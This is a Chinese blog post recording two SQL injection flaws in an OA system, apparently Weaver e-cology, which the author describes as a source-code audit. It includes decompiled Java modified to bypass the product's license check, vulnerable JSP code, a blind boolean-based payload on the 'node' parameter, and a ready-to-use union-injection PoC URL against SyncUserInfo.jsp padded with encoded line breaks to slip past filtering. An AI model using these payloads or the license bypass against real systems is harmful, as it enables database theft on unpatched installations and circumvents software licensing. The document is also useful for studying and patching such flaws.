记录某微两处SQL注入

最新推荐文章于 2024-03-12 16:53:55 发布
最新推荐文章于 2024-03-12 16:53:55 发布
阅读量660 收藏
点赞数 1
分类专栏: 黑客技术 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45901902/article/details/119812582
版权

前言

以下两个SQL注入最新版本均已修复。虽然漏洞比较水,一眼就看的出但还是记录一下。源码审计,还是想搭下相应的环境对漏洞复现更能直观反映,发现其要导入相应的license证书才能正常使用。看了下证书的生成发现没有私钥绕不过(太菜了),那只能用暴力方法把源代码校验方法给改了。
主要改两个文件:
1.classbean/api/login/util/LoginUtil.classbeforeCheckUser函数修改

private String beforeCheckUser(HttpServletRequest var1, HttpServletResponse var2) {
      RecordSet var3 = new RecordSet();
      StaticObj var4 = StaticObj.getInstance();
      Calendar var5 = Calendar.getInstance();
      String var6 = Util.add0(var5.get(1), 4) + "-" + Util.add0(var5.get(2) + 1, 2) + "-" + Util.add0(var5.get(5), 2);

      try {
         String var7 = Util.null2String(var1.getParameter("loginid"));
         String var8 = Util.null2String(var1.getParameter("logintype"), "1");
         String var9 = Util.null2String(var1.getParameter("validatecode"));
         if (!this.checkLoginType(var7, var8)) {
            return "16";
         } else if (!this.checkIpSegByForbidLogin(var1, var7) && this.checkIsNeedIp(var7)) {
            return "88";
         } else {
            ChgPasswdReminder var10 = new ChgPasswdReminder();
            RemindSettings var11 = var10.getRemindSettings();
            int var12 = var11.getNeedvalidate();
            String var13 = Util.null2String((String)var1.getSession(true).getAttribute("validateRand")).trim();
            if (var13.length() == 0) {
               String var14 = Util.null2String(var1.getParameter("validateCodeKey"));
               if (var14.length() > 0) {
                  var13 = Util.null2String(Util_DataMap.getObjVal(var14));
                  Util_DataMap.clearVal(var14);
               }
            }

            int var26 = var11.getNumvalidatewrong();
            byte var15 = 0;
            boolean var16 = (new VerifyPasswdCheck()).getUserCheck(var7, "", 1);
            if (var16) {
               return "110";
            } else {
               var3.executeQuery("select isADAccount from hrmresource where loginid=?", new Object[]{var7});
               if (var3.next()) {
                  this.isADAccount = var3.getString("isADAccount");
               }

               if (var7.indexOf(";") <= -1 && var7.indexOf("--") <= -1 && var7.indexOf(" ") <= -1 && var7.indexOf("'") <= -1) {
                  String var17 = (String)var4.getObject("isLicense");
                  LN var18 = new LN();

                  try {
                     var4.putObject("isLicense", "true");
                  } catch (Exception var24) {
                     var4.putObject("isLicense", "true");
                  }

                  String var19 = Util.null2String(var18.getConcurrentFlag());
                  int var20 = Util.getIntValue(var18.getHrmnum());
                  if ("1".equals(var19)) {
                     LicenseCheckLogin var21 = new LicenseCheckLogin();
                     if (var21.getLicUserCheck(var7, var20)) {
                        this.recordFefuseLogin(var7);
                        return "26";
                     }
                  }

                  if (var8.equals("1") && var12 == 1) {
                     if (var13.trim().equals("") || "".equals(var9.trim())) {
                        return "52";
                     }

                     if (var15 >= var26 && !var13.toLowerCase().equals(var9.trim().toLowerCase())) {
                        return "52";
                     }
                  }

                  String var27 = (String)var4.getObject("software");
                  String var22 = "n";
                  String var23 = "n";
                  if (var27 == null) {
                     var3.executeQuery("select * from license", new Object[0]);
                     if (var3.next()) {
                        var27 = var3.getString("software");
                        if (var27.equals("")) {
                           var27 = "ALL";
                        }

                        var4.putObject("software", var27);
                        var22 = var3.getString("portal");
                        if (var22.equals("")) {
                           var22 = "n";
                        }

                        var4.putObject("portal", var22);
                        var23 = var3.getString("multilanguage");
                        if (var23.equals("")) {
                           var23 = "n";
                        }

                        var4.putObject("multilanguage", var23);
                     }
                  }

                  return "";
               } else {
                  return "16";
               }
            }
         }
      } catch (Exception var25) {
         return "-1";
      }
   }

2.classbean/weaver/login/LicenseCheckLogin.class的getLicUserCheck函数修改:

public boolean getLicUserCheck(String var1, int var2) {
      boolean var3 = true;
      if (!"sysadmin".equals(var1)) {
         int var4 = this.checkUserLoginCount();
         if (var4 >= var2) {
            var3 = true;
         }
      }
      return var3;
   }

修改完后重编译替换原来的文件,服务再重启下就可以绕过了。

第一处SQL注入

漏洞参数node

<%
String node=Util.null2String(request.getParameter("node"));
String arrNode[]=Util.TokenizerString2(node,"_");
String type=arrNode[0];
String value=arrNode[1];

String scope = Util.null2String(request.getParameter("scope"));
String typeids="";
String flowids="";
String nodeids="";
ArrayList typeidList=new ArrayList();
ArrayList flowidList=new ArrayList();
ArrayList nodeidList=new ArrayList();

rs.executeSql("select * from mobileconfig where mc_type=5 and mc_scope="+scope+" and mc_name='typeids' ");
if(rs.next()){
    typeids=Util.null2String(rs.getString("mc_value")); 
    typeidList=Util.TokenizerString(typeids,",");
}

rs.executeSql("select * from mobileconfig where mc_type=5 and mc_scope="+scope+" and mc_name='flowids' ");
if(rs.next()){
    flowids=Util.null2String(rs.getString("mc_value"));
    flowidList=Util.TokenizerString(flowids,",");
}

rs.executeSql("select * from mobileconfig where mc_type=5 and mc_scope="+scope+" and mc_name='nodeids' ");
if(rs.next()){
    nodeids=Util.null2String(rs.getString("mc_value")); 
    nodeidList=Util.TokenizerString(nodeids,",");
}


JSONArray jsonArrayReturn= new JSONArray();

if("root".equals(type)){ //主目录下的数据
    WorkTypeComInfo wftc=new WorkTypeComInfo();
    while(wftc.next()){ 
        JSONObject jsonTypeObj=new JSONObject();    
        String wfTypeId=wftc.getWorkTypeid();
        String wfTypeName=wftc.getWorkTypename();
        //if("1".equals(wfTypeId)) continue; 
        jsonTypeObj.put("id","wftype_"+wfTypeId);
        jsonTypeObj.put("text",wfTypeName);
        if(!typeidList.contains(wfTypeId)){
            jsonTypeObj.put("checked",false);      
        } else {
            jsonTypeObj.put("checked",true);
            jsonTypeObj.put("expanded",true);
        }
        jsonTypeObj.put("draggable",false);
        jsonTypeObj.put("leaf",false);
        jsonArrayReturn.put(jsonTypeObj);
    }
} else if ("wftype".equals(type)){
    rs.executeSql("select id,workflowname from workflow_base where isvalid='1' and workflowtype="+value);   
    while (rs.next()){

        JSONObject jsonWfObj=new JSONObject();  
        String wfId=Util.null2String(rs.getString("id"));
        String wfName=Util.null2String(rs.getString("workflowname"));
        jsonWfObj.put("id","wf_"+wfId);
        jsonWfObj.put("text",wfName);
        jsonWfObj.put("draggable",false);

        if(!flowidList.contains(wfId)){
            jsonWfObj.put("checked",false);    
        } else {
            jsonWfObj.put("checked",true);
            jsonWfObj.put("expanded",true);
        }
        jsonWfObj.put("leaf",true);
        jsonArrayReturn.put(jsonWfObj);
    }

如上代码服务端接受前端传入的问题参数node,将node_为分隔符将node分为两个部分分别赋值给typevalue两个参数,在rs.executesql()处将value值直接拼接入sql语句执行数据库操作,并将查询结果以json格式返回。

漏洞复现:

抓取数据包,构造payloadscope=1&node=wftype_5/if(ascii(substr(user(),1,1))=114,1,0)

判断数据库用户名第一个字符的ascii码,if条件为真返回1,执行5/1,返回相应数据如下所示:


判断错误,if条件为假返回0,执行5/0,0不能为除数,数据库执行错误无数据返回,如下所示:

第二处SQL注入


跟进ps.syncUserInfo(userIdentifiers);发现直接拼接进入sql语句造成sql注入:


漏洞复现进行联合注入:


poc

/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=1,2%29%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion%20select%201%2C2%2C3%2C4%2Cuser()%2C6%2C7%2C8%20order%20by%208%23
00后初来乍到
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OA数据如何写入SAP接口
jinsi_1994的博客
03-16 1838
这里主要是一个OA系统数据写入到SAP系统的案例: package com.weaver.integration.action; import com.sap.mw.jco.IFunctionTemplate; import com.sap.mw.jco.JCO; import com.sap.mw.jco.JCO.Client; import com.sap.mw.jco.JCO.Funct...
构造函数2
lanyanjiayu的专栏
01-05 334
// String 的普通构造函数 String::String(const char *str) // 6 分 { if(str==NULL) { m_data = new char[1]; // 若能加 NULL 判断则更好 *m_data = ‘\0’; } else { int length = strlen(str); m_data = new char[lengt
SQL注入的场景复现和解决方案
欢迎来到 ABin-阿斌的博客:写一生代码,创一世佳话,筑一览芳华。
03-12 1014
SQL注入SQL Injection)是一种常见的网络攻击技术,它利用应用程序没有正确过滤用户输入的数据,将恶意的 SQL 代码注入到应用程序中执行,从而导致应用程序的安全性受到威胁。通简单来说,就是通过构造恶意的 SQL 语句,将恶意代码注入到应用程序中执行,从而实现各种攻击手段。
新建/编辑__前后台交互
qq_49192483的博客
07-06 113
form表单绑定新建/编辑前后台交互 下拉 隐藏域 js 后台
null的伟大与可怕 之 String字符串方法2
sunrainamazing的博客
05-10 399
标题 null的伟大与可怕 之 String字符串 1 http://blog.csdn.net/sunrainamazing/article/details/71591334 null的伟大与可怕 之 String字符串方法2 package sun.rain.amazing.strnull;import org.junit.Test;/** * Created by sun
Excel文件导出
weixin_40476233的博客
07-15 2024
Excel文件导出说明前端代码前端页面现有的id和name标准规格:js代码:js代码注意点:后端代码jsp代码获取到数据并把数据以Excel形式表现出来FL_ExcelExportDetailUtil.jsp文件GetTextByColumn.java文件下面是查询的sql 说明 这个功能是基于泛8.0平台,以js代码,调用后端jsp动态导出Excel文件。 前端代码 前端页面现有的id和name标准规格: js代码: //明细1导出 var str1="<input type='butto
SQL SERVER 2000开发与管理应用实例
12-13
13.5.1 防止SQL注入式攻击 417 13.5.2 限制应用程序访问 418 13.5.3 不安全的扩展存储过程 419 第 14 章 系统表应用实例 423 14.1 系统对象概述 423 14.1.1 每个数据库中都存在的系统表 424 ...
sqlserver2000基础(高手也有用)
08-17
13.5.1 防止SQL注入式攻击 417 13.5.2 限制应用程序访问 418 13.5.3 不安全的扩展存储过程 419 第 14 章 系统表应用实例 423 14.1 系统对象概述 423 14.1.1 每个数据库中都存在的系统表 424 14.1.2 仅...
最好的asp CMS系统科讯CMSV7.0全功能SQL商业版,KesionCMS V7.0最新商业全能版-免费下载
03-09
支持后台访问目录更名、Cookie加密、验证码、认证码、IP锁定、IP白名单、防SQL注入、防跨站脚本、防脚本文件上传等多重安全机制,并且后台支持按频道和模块严格控制访问权限,为网站的安全运营提供最强有力的保障。...
商易网店统计系统ECSTAT 1.1.zip
05-25
2.增加产品安全性,修补两BUG 3.程序完全开源免费. 4.集成支付宝. 功能: 1.统计系统支持多用户申请,同时支持网站和网店统计 2.总共60种记数器图片样式可以选择,还有两种统计图标可以选择,完全满足你的...
动易内容管理系统2006普及版 Sp4 Build 1025
03-26
安全检查应用于每一代码中,可自动屏蔽恶意攻击代码,从而全面防止SQL注入攻击、密码猜解、上传木马等各种攻击手段,最大化保证了系统的安全和稳定;独有的全程操作记录功能,完整详细的记录了系统的各种运行情况...
Java String转换时为null的解决方法
08-30
主要介绍了Java String转换时为null的解决方法,需要的朋友可以参考下
OA流程节点附加操作-自定义接口动作
reneeyau的博客
10-20 3608
OA流程节点附加操作-自定义接口动作
使用StringUtils工具类的注意点(强转String时为null的情况)
Enpi_的博客
04-30 300
通过debug的方式,发现了当前端传来的参数为空时,后台接收的时候,为null。因此再使用工具类,判断非空的条件也就不满足,不为空。果然还是得用最基础的,直接!=null,一步到位。例如下图,对于mybatis plus的eq等值匹配,我们知道eq()方法的第一个参数是条件判断。所以需要对参数做校验操作,如果为空,就不让该参数参与后面的匹配操作。但是对于当前情况,由于status的类型为short。我的第一反应是使用String的API,再使用工具类判断非空,不料弄巧成拙。记录一下一个小bug。
java--String转double、BigDecimal转double
Silentli20的博客
04-27 575
String Area = Util.null2String((String) detailMap.get("YYZMJHMDM")); C_Store_Area = Double.parseDouble(Area); // String转Double logger.info("店铺营业总面积:" + C_Store_Area); String sellingarea = Util.null2String((String) detailMap.get("YYMJMDM")); C_Store_sellin.
StringUtil小方法:判断字符串是否为null或者““
qq_47637405的博客
07-27 406
可以单独在util包里进行调用。
E9二次开发,用计划任务定时发送邮件提醒
reneeyau的博客
07-07 3282
计划任务定期发送邮件提醒
SpringMVC列表数据导出
心在哪里,成果就在哪里
11-06 686
页面上怎么写?              行内加点击事件: 导出数据        Js函数: function exportRegInfo(){ var id = getUrlParams("id"); var _url='/thoughtism/activityReg/getRegListExcel.json?id='+id+"&name="+name;
最新漏洞汇总----实时更新!!!
yggcwhat
07-31 3431
最新漏洞汇总
sql注入的两大分类
最新发布
05-06
SQL注入可以分为以下两大分类: 1. 基于错误的注入:这种类型的注入是通过构造恶意的SQL语句,使得数据库在执行时产生错误信息。攻击者可以通过错误信息获取数据库的结构、数据或者其他敏感信息。常见的基于错误的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值